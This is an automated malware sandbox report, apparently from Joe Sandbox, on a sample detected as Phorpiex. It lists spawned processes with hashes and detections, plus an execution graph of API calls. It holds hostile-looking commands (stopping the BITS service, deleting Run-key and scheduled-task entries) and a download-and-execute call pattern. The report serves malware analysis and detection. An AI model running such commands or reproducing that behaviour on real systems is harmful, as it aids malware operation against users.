                                                                                                                                                        MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:14
                                                                                                                                                        Start time:01:26:27
                                                                                                                                                        Start date:26/10/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:sc stop BITS /wait
                                                                                                                                                        Imagebase:0x1e0000
                                                                                                                                                        File size:61'440 bytes
                                                                                                                                                        MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:15
                                                                                                                                                        Start time:01:26:28
                                                                                                                                                        Start date:26/10/2024
                                                                                                                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                        Imagebase:0x7ff6ef0c0000
                                                                                                                                                        File size:496'640 bytes
                                                                                                                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:17
                                                                                                                                                        Start time:01:26:36
                                                                                                                                                        Start date:26/10/2024
                                                                                                                                                        Path:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\sysppvrdnvs.exe"
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:85'504 bytes
                                                                                                                                                        MD5 hash:06560B5E92D704395BC6DAE58BC7E794
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000011.00000002.2413964057.0000000000410000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000011.00000000.2392940461.0000000000410000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:18
                                                                                                                                                        Start time:01:26:43
                                                                                                                                                        Start date:26/10/2024
                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\2355412914.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\2355412914.exe
                                                                                                                                                        Imagebase:0x430000
                                                                                                                                                        File size:8'704 bytes
                                                                                                                                                        MD5 hash:CB8420E681F68DB1BAD5ED24E7B22114
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Antivirus matches:
                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                        • Detection: 75%, ReversingLabs
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:19
                                                                                                                                                        Start time:01:26:43
                                                                                                                                                        Start date:26/10/2024
                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                                                                                                                                        Imagebase:0x7ff6ff0f0000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:20
                                                                                                                                                        Start time:01:26:43
                                                                                                                                                        Start date:26/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:21
                                                                                                                                                        Start time:01:26:43
                                                                                                                                                        Start date:26/10/2024
                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
                                                                                                                                                        Imagebase:0x7ff6ff0f0000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:22
                                                                                                                                                        Start time:01:26:43
                                                                                                                                                        Start date:26/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:23
                                                                                                                                                        Start time:01:26:43
                                                                                                                                                        Start date:26/10/2024
                                                                                                                                                        Path:C:\Windows\System32\reg.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                                                                                                                                        Imagebase:0x7ff7e3290000
                                                                                                                                                        File size:77'312 bytes
                                                                                                                                                        MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:24
                                                                                                                                                        Start time:01:26:43
                                                                                                                                                        Start date:26/10/2024
                                                                                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:schtasks /delete /f /tn "Windows Upgrade Manager"
                                                                                                                                                        Imagebase:0x7ff62f0e0000
                                                                                                                                                        File size:235'008 bytes
                                                                                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:26
                                                                                                                                                        Start time:01:26:46
                                                                                                                                                        Start date:26/10/2024
                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\2658326577.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\2658326577.exe
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:85'504 bytes
                                                                                                                                                        MD5 hash:06560B5E92D704395BC6DAE58BC7E794
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 0000001A.00000002.2514348766.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 0000001A.00000000.2493732494.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Temp\2658326577.exe, Author: Joe Security
                                                                                                                                                        Antivirus matches:
                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                        • Detection: 82%, ReversingLabs
                                                                                                                                                        Has exited:true

                                                                                                                                                        Disassembly

                                                                                                                                                        Reset < >

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:2.9%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                          Signature Coverage:11.9%
                                                                                                                                                          Total number of Nodes:1127
                                                                                                                                                          Total number of Limit Nodes:30
                                                                                                                                                          execution_graph 53729 428840 384 API calls 53801 454140 6 API calls 4 library calls 53803 451f40 51 API calls _unexpected 53726 407b4f 16 API calls ___delayLoadHelper2@8 53731 40b250 60 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 53804 40b150 70 API calls 53733 439050 GetProcessHeap HeapAlloc 53806 461150 51 API calls 53807 475150 CompareStringOrdinal GetLastError 53808 45bf58 42 API calls 3 library calls 53735 40ac60 76 API calls 2 library calls 53809 40b560 79 API calls 53810 40a960 56 API calls 53811 428760 179 API calls 52451 439060 52452 439084 52451->52452 52453 4390a2 52452->52453 52454 439099 CloseHandle 52452->52454 52454->52453 53738 439460 43 API calls _memcpy_s 53739 451660 42 API calls 52476 47656c 52477 47654b 52476->52477 52478 407e32 ___delayLoadHelper2@8 16 API calls 52477->52478 52478->52477 53814 40a770 72 API calls 53741 428470 58 API calls 53742 44d473 149 API calls 53747 43a400 117 API calls 53820 45a100 7 API calls ___scrt_uninitialize_crt 53821 45bb00 16 API calls _memcpy_s 52483 4c9000 52489 4c9009 52483->52489 52485 4c901d 52501 4c9cc0 GetPEB 52485->52501 52487 4c9777 52502 4517a7 52487->52502 52513 451672 52487->52513 52488 4c9795 52489->52485 52490 4c91c2 GetFileAttributesW 52489->52490 52492 4c92c8 GetTempFileNameW 52489->52492 52493 4c9390 URLDownloadToFileW 52489->52493 52494 4c96eb DeleteFileW 52489->52494 52495 4c9730 CreateProcessW 52489->52495 52498 4c9cd0 52489->52498 52490->52485 52491 4c91d9 LoadLibraryExA 52490->52491 52491->52485 52491->52489 52492->52485 52492->52489 52493->52485 52493->52489 52494->52489 52495->52485 52495->52489 52541 4c9cc0 GetPEB 52498->52541 52500 4c9ce2 52500->52489 52501->52487 52542 451eea GetModuleHandleW 52502->52542 52504 4517af 52505 4517e5 52504->52505 52506 4517b3 52504->52506 52544 459b6d 21 API calls CallUnexpected 52505->52544 52507 4517be 52506->52507 52543 459b4f 21 API calls CallUnexpected 52506->52543 52507->52488 52510 4517ed 52545 451cc8 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 52510->52545 52512 4517f5 __scrt_common_main_seh 52514 45167e __FrameHandler3::FrameUnwindToState 52513->52514 52546 451aa0 52514->52546 52516 451685 52517 4517d8 52516->52517 52529 4516af ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 52516->52529 52582 451d9f 4 API calls 2 library calls 52517->52582 52519 4517df 52575 459ba9 52519->52575 52523 4517ed 52584 451cc8 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 52523->52584 52524 4516ce 52524->52488 52526 4517f5 __scrt_common_main_seh 52527 45174f 52554 451eb4 52527->52554 52529->52524 52529->52527 52578 459b83 41 API calls 3 library calls 52529->52578 52530 451755 52558 401121 52530->52558 52535 451771 52535->52519 52536 451775 52535->52536 52537 45177e 52536->52537 52580 459b5e 21 API calls CallUnexpected 52536->52580 52581 451c11 77 API calls ___scrt_uninitialize_crt 52537->52581 52540 451786 52540->52524 52541->52500 52542->52504 52543->52507 52544->52510 52545->52512 52547 451aa9 52546->52547 52585 452045 IsProcessorFeaturePresent 52547->52585 52549 451ab5 52586 45429e 10 API calls 2 library calls 52549->52586 52551 451aba 52552 451abe 52551->52552 52587 4542bd 7 API calls 2 library calls 52551->52587 52552->52516 52588 452250 52554->52588 52557 451eda 52557->52530 52590 406418 SetLastError GetModuleFileNameW 52558->52590 52560 40118e 52561 401192 CreateFileW 52560->52561 52562 4011af 52560->52562 52561->52562 52608 401641 HeapSetInformation 52562->52608 52568 4011d1 52569 4011f8 CloseHandle 52568->52569 52570 4011ff 52568->52570 52569->52570 52571 40120d 52570->52571 52748 404128 GetProcessHeap HeapFree GetLastError 52570->52748 52749 451586 52571->52749 52574 401223 52579 451eea GetModuleHandleW 52574->52579 53677 4599dd 52575->53677 52578->52527 52579->52535 52580->52537 52581->52540 52582->52519 52583 459b6d 21 API calls CallUnexpected 52583->52523 52584->52526 52585->52549 52586->52551 52587->52552 52589 451ec7 GetStartupInfoW 52588->52589 52589->52557 52591 406480 52590->52591 52592 406446 GetLastError 52590->52592 52593 40651b 52591->52593 52594 40648b GetLastError 52591->52594 52597 406452 52592->52597 52761 403471 52 API calls 52593->52761 52594->52593 52596 40649a 52594->52596 52756 40429c 52596->52756 52597->52560 52599 4064ca SetLastError 52602 4064d1 GetModuleFileNameW 52599->52602 52600 4064a5 52600->52597 52600->52599 52601 4064c4 52600->52601 52601->52599 52603 406576 GetLastError 52602->52603 52604 4064e7 GetLastError 52602->52604 52606 406516 52603->52606 52604->52597 52605 4064f6 52604->52605 52605->52602 52605->52606 52760 403471 52 API calls 52605->52760 52606->52597 52763 401453 52608->52763 52610 40165c 52611 40167f 52610->52611 52613 401673 SetDefaultDllDirectories 52610->52613 52612 4016aa 52611->52612 52616 401696 SetDllDirectoryW 52611->52616 52614 4011ba 52612->52614 52769 4018a4 52612->52769 52613->52614 52615 401679 GetLastError 52613->52615 52620 4010b0 52614->52620 52615->52611 52616->52612 52617 40169c 52616->52617 52617->52612 52619 4016a4 GetLastError 52617->52619 52619->52612 52621 403578 56 API calls 52620->52621 52622 4010cf 52621->52622 52623 401115 ExitProcess 52622->52623 52843 40252b GetFileAttributesW 52622->52843 52628 4018a4 68 API calls 52629 4010ff 52628->52629 52629->52623 52630 401103 52629->52630 52631 401111 52630->52631 52852 404128 GetProcessHeap HeapFree GetLastError 52630->52852 52633 4091f2 52631->52633 52634 409265 _memcpy_s 52633->52634 52635 40928f GetModuleHandleW 52634->52635 52853 46606b InitializeCriticalSection 52635->52853 52637 4092a9 52854 466304 52637->52854 52643 40930b 52644 409353 52643->52644 52645 40933d 52643->52645 52659 4092d5 52643->52659 52650 40935e CoInitializeEx 52644->52650 53015 42bbb7 15 API calls 52645->53015 52647 409665 52651 409677 52647->52651 53001 419e57 52647->53001 52648 409351 52648->52644 52653 409395 52650->52653 52650->52659 53008 41490b 94 API calls 52651->53008 52879 46553f 52653->52879 52656 409683 53009 41eba3 94 API calls 52656->53009 52657 40939d 52657->52659 52894 46bf91 52657->52894 52659->52647 53021 404128 GetProcessHeap HeapFree GetLastError 52659->53021 52660 40968f 53010 41edb1 GetProcessHeap HeapFree GetLastError _memcpy_s 52660->53010 52664 4096c7 52666 40970a 52664->52666 52674 4096e7 52664->52674 52668 409705 52666->52668 52675 409885 72 API calls 52666->52675 52667 4093d4 52667->52659 52909 46a557 52667->52909 53011 465e0a EnterCriticalSection FlushFileBuffers GetLastError LeaveCriticalSection 52668->53011 52669 40969b 52669->52664 52677 409885 72 API calls 52669->52677 52672 409730 52676 40975e 52672->52676 52678 409742 52672->52678 52682 409885 72 API calls 52674->52682 52675->52668 52680 40975c 52676->52680 52681 409767 52676->52681 52677->52664 53022 41b1ed 54 API calls 52678->53022 53025 42c17d IsWindow PostMessageW 52680->53025 52685 409885 72 API calls 52681->52685 52682->52668 52684 40941e 52684->52659 52940 4665b2 52684->52940 52686 409773 52685->52686 53023 408525 90 API calls 52686->53023 52688 4097a8 52691 4097b1 52688->52691 52692 4097be 52688->52692 53026 424bd4 WaitForSingleObject GetLastError 52691->53026 53027 422399 WaitForSingleObject GetLastError SetEvent GetLastError 52692->53027 52694 409781 52694->52680 53024 465caa 72 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 52694->53024 52697 40946a GetNativeSystemInfo 52709 409487 52697->52709 52698 4097bc 52701 409813 52698->52701 52699 4097ca 53028 4662d8 EnterCriticalSection LeaveCriticalSection 52699->53028 53033 408f7d 23 API calls _memcpy_s 52701->53033 52703 406418 60 API calls 52706 4094be 52703->52706 52705 4097d3 52708 4097fb 52705->52708 53029 4663a6 EnterCriticalSection 52705->53029 52950 409885 52706->52950 52707 40981f 52711 409828 52707->52711 52712 40982d 52707->52712 52714 409885 72 API calls 52708->52714 52709->52703 53034 46bd4c CoUninitialize 52711->53034 52717 40983b 52712->52717 53012 46ab77 52712->53012 52714->52698 52721 409849 52717->52721 53035 4684d0 FreeLibrary 52717->53035 52718 4097e7 52718->52708 53032 404128 GetProcessHeap HeapFree GetLastError 52718->53032 52719 409509 52953 422c5c 52719->52953 52726 40985c 52721->52726 53036 46c05b FreeLibrary FreeLibrary 52721->53036 52728 409860 CoUninitialize 52726->52728 52729 409866 52726->52729 52728->52729 53038 4663d0 78 API calls 52729->53038 52730 409857 53037 465697 FreeLibrary FreeLibrary 52730->53037 52736 4095ad 53018 408adf 822 API calls 52736->53018 52737 409626 52737->52659 52738 409872 52740 451586 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 52738->52740 52739 40955b 53017 408e52 161 API calls 52739->53017 52744 409881 52740->52744 52742 4095f6 52742->52659 53020 408b53 814 API calls 52742->53020 52744->52568 52745 4095c0 52745->52659 52747 4095c6 52745->52747 52746 40958c 52746->52659 52746->52736 53019 408874 231 API calls 52747->53019 52748->52571 52750 45158f IsProcessorFeaturePresent 52749->52750 52751 45158e 52749->52751 52753 451945 52750->52753 52751->52574 53676 451908 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 52753->53676 52755 451a28 52755->52574 52757 4042a8 52756->52757 52759 4042b4 52756->52759 52762 4078fc GetProcessHeap HeapSize 52757->52762 52759->52600 52760->52605 52761->52600 52762->52759 52764 401460 GetModuleHandleW 52763->52764 52765 4014e4 52763->52765 52766 401472 GetLastError 52764->52766 52767 4014b7 GetProcAddress GetProcAddress 52764->52767 52765->52610 52768 40147e 52766->52768 52767->52765 52768->52610 52770 401453 4 API calls 52769->52770 52771 4018af 52770->52771 52772 4018b7 LoadLibraryExW 52771->52772 52773 401919 52771->52773 52774 4018d1 GetLastError 52772->52774 52776 4018dd 52772->52776 52777 40192e 52773->52777 52774->52776 52776->52612 52787 406884 52777->52787 52779 401946 52780 40194c 52779->52780 52803 403578 52779->52803 52784 401a15 52780->52784 52806 404128 GetProcessHeap HeapFree GetLastError 52780->52806 52783 4019a5 LoadLibraryExW 52783->52780 52785 4019ba GetLastError 52783->52785 52784->52776 52785->52780 52788 406913 52787->52788 52789 406898 52787->52789 52807 403471 52 API calls 52788->52807 52791 40429c 2 API calls 52789->52791 52792 4068a3 52791->52792 52793 4068c3 GetSystemDirectoryW 52792->52793 52802 4068a9 52792->52802 52794 4068d2 GetLastError 52793->52794 52795 40693c 52793->52795 52794->52802 52796 4069a6 52795->52796 52808 403471 52 API calls 52795->52808 52796->52802 52809 405cbf 52796->52809 52799 406948 52800 40695f GetSystemDirectoryW 52799->52800 52799->52802 52800->52796 52801 40696c GetLastError 52800->52801 52801->52802 52802->52779 52824 40358c 52803->52824 52806->52784 52807->52792 52808->52799 52810 40429c 2 API calls 52809->52810 52813 405cdc 52810->52813 52811 405ce2 52811->52802 52813->52811 52814 403485 52813->52814 52817 402686 52814->52817 52816 403498 52816->52811 52818 40269d 52817->52818 52820 4026a8 52817->52820 52819 40429c 2 API calls 52818->52819 52819->52820 52822 4026ae 52820->52822 52823 40294d 52 API calls 52820->52823 52822->52816 52823->52822 52827 4027c0 52824->52827 52826 40197e 52826->52780 52826->52783 52828 4027d9 52827->52828 52832 4027e3 52827->52832 52838 4078fc GetProcessHeap HeapSize 52828->52838 52833 4027e9 52832->52833 52835 40285e 52832->52835 52839 40294d 52 API calls 52832->52839 52833->52826 52835->52833 52836 4028d4 52835->52836 52840 403204 45 API calls __vsnwprintf_l 52835->52840 52841 40294d 52 API calls 52835->52841 52836->52833 52842 404128 GetProcessHeap HeapFree GetLastError 52836->52842 52838->52832 52839->52835 52840->52835 52841->52835 52842->52833 52844 4010df 52843->52844 52844->52623 52845 4050e3 52844->52845 52846 452250 _memcpy_s 52845->52846 52847 405113 FindFirstFileW 52846->52847 52848 40513a 52847->52848 52849 405129 FindClose 52847->52849 52850 451586 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 52848->52850 52849->52848 52851 4010ec 52850->52851 52851->52623 52851->52628 52852->52631 52853->52637 52856 466315 52854->52856 52857 4092bb 52854->52857 52856->52857 53039 40ba47 73 API calls 52856->53039 52858 46478a 52857->52858 52859 403485 52 API calls 52858->52859 52860 4647a8 52859->52860 52861 403485 52 API calls 52860->52861 52865 4647ae 52860->52865 52862 4647d6 52861->52862 52863 4647ea CommandLineToArgvW 52862->52863 52862->52865 52864 4647fb GetLastError 52863->52864 52863->52865 52864->52865 52866 4092cf 52865->52866 53040 404128 GetProcessHeap HeapFree GetLastError 52865->53040 52866->52659 52868 408283 InitializeCriticalSection InitializeCriticalSection InitializeCriticalSection 52866->52868 52869 4082e9 52868->52869 52870 4082f5 GetCurrentProcess 52869->52870 53041 46674a OpenProcessToken 52870->53041 52874 408322 52875 408328 52874->52875 53112 40f28d 52874->53112 52875->52643 52880 4018a4 68 API calls 52879->52880 52881 465550 52880->52881 52882 465556 GetProcAddress GetProcAddress 52881->52882 52883 465584 52881->52883 52882->52883 52884 4018a4 68 API calls 52883->52884 52886 4655af 52883->52886 52885 4655a9 52884->52885 52885->52886 52887 4655cd GetProcAddress 52885->52887 52886->52657 52888 4655ec 52887->52888 52889 46562b GetProcAddress 52887->52889 52888->52889 52890 4655f0 GetLastError 52888->52890 52889->52886 52891 46564a 52889->52891 52893 4655fc 52890->52893 52891->52886 52892 46564e GetLastError 52891->52892 52892->52893 52893->52886 52895 4018a4 68 API calls 52894->52895 52896 46bfa0 52895->52896 52897 46bfa4 GetProcAddress GetProcAddress 52896->52897 52898 46bfd0 52896->52898 52897->52898 52899 4018a4 68 API calls 52898->52899 52900 46bfdf 52899->52900 52901 46bfe3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 52900->52901 52902 4093cf 52900->52902 52901->52902 52903 467873 52902->52903 52904 4018a4 68 API calls 52903->52904 52905 467883 52904->52905 52906 4678a4 GetProcAddress GetProcAddress 52905->52906 52908 467889 52905->52908 52907 4678d9 52906->52907 52907->52908 52908->52667 52910 40192e 62 API calls 52909->52910 52911 46a573 52910->52911 52914 46a579 52911->52914 53457 40588e 52911->53457 52913 46a5ac GetProcAddress 52915 46a5d0 GetProcAddress 52913->52915 52916 46a5cb 52913->52916 52919 4093f9 52914->52919 53469 404128 GetProcessHeap HeapFree GetLastError 52914->53469 52917 46a5f4 GetProcAddress 52915->52917 52918 46a5ef 52915->52918 52916->52915 52920 46a613 52917->52920 52921 46a618 GetProcAddress 52917->52921 52918->52917 52919->52659 52934 46b53b 52919->52934 52920->52921 52923 46a637 52921->52923 52924 46a63c GetProcAddress 52921->52924 52923->52924 52925 46a660 GetProcAddress 52924->52925 52926 46a65b 52924->52926 52927 46a684 GetProcAddress 52925->52927 52928 46a67f 52925->52928 52926->52925 52929 46a6a3 52927->52929 52928->52927 52930 46a6c7 52929->52930 52931 46a6b1 GetProcAddress 52929->52931 52932 46a6e6 52930->52932 52933 46a6d0 GetProcAddress 52930->52933 52931->52930 52932->52914 52933->52932 52935 46b55b 52934->52935 52936 46b549 CoInitialize 52934->52936 52937 46b58f CLSIDFromProgID 52935->52937 52939 46b55f 52935->52939 52936->52935 52938 46b5a4 CLSIDFromProgID 52937->52938 52937->52939 52938->52939 52939->52684 52941 4665ca 52940->52941 52947 4665ec 52940->52947 52944 4018a4 68 API calls 52941->52944 52942 4666a2 FreeLibrary 52943 40944d 52942->52943 52943->52659 52943->52697 52945 4665e2 52944->52945 52946 466633 GetProcAddress 52945->52946 52945->52947 52948 466647 GetLastError 52946->52948 52949 466653 52946->52949 52947->52942 52947->52943 52948->52949 52949->52947 53470 466033 52950->53470 52954 422c7f _memcpy_s 52953->52954 53475 40c1df InitializeCriticalSection 52954->53475 52960 422cdf 52984 422c97 52960->52984 53492 4105a4 8 API calls 52960->53492 52963 42302a 52965 423038 52963->52965 53505 404128 GetProcessHeap HeapFree GetLastError 52963->53505 52964 422d0a 52964->52984 53493 44e97e 214 API calls 52964->53493 52967 423046 52965->52967 53506 404128 GetProcessHeap HeapFree GetLastError 52965->53506 52970 40951c 52967->52970 53507 40758b GetProcessHeap HeapFree GetLastError 52967->53507 52970->52736 52970->52739 52970->52742 52970->52747 52972 422d30 52972->52984 53494 4212c2 59 API calls 52972->53494 52974 422d89 52975 409885 72 API calls 52974->52975 52974->52984 52976 422dbc 52975->52976 52977 422e03 52976->52977 52978 422dc9 52976->52978 53496 42305d 60 API calls 52977->53496 53495 465caa 72 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 52978->53495 52981 422e09 52981->52984 53497 40cf8d 80 API calls 52981->53497 52983 422e3c 52983->52984 53498 40cf8d 80 API calls 52983->53498 53504 410222 11 API calls _memcpy_s 52984->53504 52986 422ebd 52986->52984 52988 422ef4 52986->52988 53500 40cfc8 80 API calls 52986->53500 52987 422e7e 52987->52984 52987->52986 53499 40cfc8 80 API calls 52987->53499 52988->52984 52991 422f35 52988->52991 53501 41e723 110 API calls 52988->53501 52991->52984 53502 4145e6 98 API calls 52991->53502 52994 422f7f 52994->52984 53503 410c1e 89 API calls 52994->53503 52996 422fab 52996->52984 52997 405d77 52 API calls 52996->52997 52998 422fd5 52997->52998 52998->52984 52999 422fef 52998->52999 53000 403958 52 API calls 52999->53000 53000->52984 53573 466096 EnterCriticalSection 53001->53573 53004 419e76 OpenEventLogW 53005 419ed4 ReportEventW CloseEventLog 53004->53005 53006 419e89 GetLastError 53004->53006 53007 419e95 53005->53007 53006->53007 53007->52651 53008->52656 53009->52660 53010->52669 53011->52672 53013 46abc6 53012->53013 53014 46ab83 FreeLibrary 53012->53014 53013->52717 53014->53013 53015->52648 53665 42b910 30 API calls 53015->53665 53016 404128 GetProcessHeap HeapFree GetLastError 53016->52719 53017->52746 53018->52745 53019->52742 53666 4080f0 66 API calls 53019->53666 53020->52737 53021->52647 53022->52680 53023->52694 53024->52680 53025->52688 53026->52698 53027->52699 53028->52705 53667 465a73 53029->53667 53031 4663bf LeaveCriticalSection 53031->52718 53032->52708 53033->52707 53034->52712 53035->52721 53036->52730 53037->52726 53038->52738 53039->52857 53040->52866 53042 466772 GetLastError 53041->53042 53043 4667ac GetTokenInformation 53041->53043 53047 46677e 53042->53047 53044 4667d4 GetLastError 53043->53044 53043->53047 53044->53047 53045 466827 CloseHandle 53046 408308 53045->53046 53048 423268 53046->53048 53047->53045 53047->53046 53053 423452 53048->53053 53103 423299 53048->53103 53049 4232bb CompareStringW 53050 4232db CompareStringW 53049->53050 53051 4241c9 CompareStringW 53049->53051 53050->53051 53052 4232fe CompareStringW 53050->53052 53051->53103 53052->53051 53054 423321 CompareStringW 53052->53054 53053->52874 53055 423344 CompareStringW 53054->53055 53054->53103 53056 423367 CompareStringW 53055->53056 53055->53103 53057 42338a CompareStringW 53056->53057 53056->53103 53058 4233ad CompareStringW 53057->53058 53057->53103 53059 4233d0 CompareStringW 53058->53059 53058->53103 53060 4233f3 CompareStringW 53059->53060 53059->53103 53061 423416 CompareStringW 53060->53061 53060->53103 53062 4234ab CompareStringW 53061->53062 53061->53103 53063 423538 CompareStringW 53062->53063 53062->53103 53064 423572 CompareStringW 53063->53064 53063->53103 53065 4235ad CompareStringW 53064->53065 53064->53103 53066 4235e8 CompareStringW 53065->53066 53065->53103 53067 423623 CompareStringW 53066->53067 53066->53103 53068 423646 CompareStringW 53067->53068 53067->53103 53069 423669 CompareStringW 53068->53069 53068->53103 53070 423694 CompareStringW 53069->53070 53069->53103 53071 4236c8 CompareStringW 53070->53071 53070->53103 53072 4236f6 CompareStringW 53071->53072 53071->53103 53073 423757 CompareStringW 53072->53073 53072->53103 53074 4237b8 CompareStringW 53073->53074 53073->53103 53075 42380b CompareStringW 53074->53075 53074->53103 53077 42385e lstrlenW CompareStringW 53075->53077 53075->53103 53076 40613d 60 API calls 53076->53103 53078 423926 CompareStringW 53077->53078 53079 423888 lstrlenW 53077->53079 53080 423a24 lstrlenW lstrlenW CompareStringW 53078->53080 53078->53103 53079->53103 53081 423a54 lstrlenW 53080->53081 53082 423aba CompareStringW 53080->53082 53081->53103 53083 423b48 CompareStringW 53082->53083 53082->53103 53085 423b8b 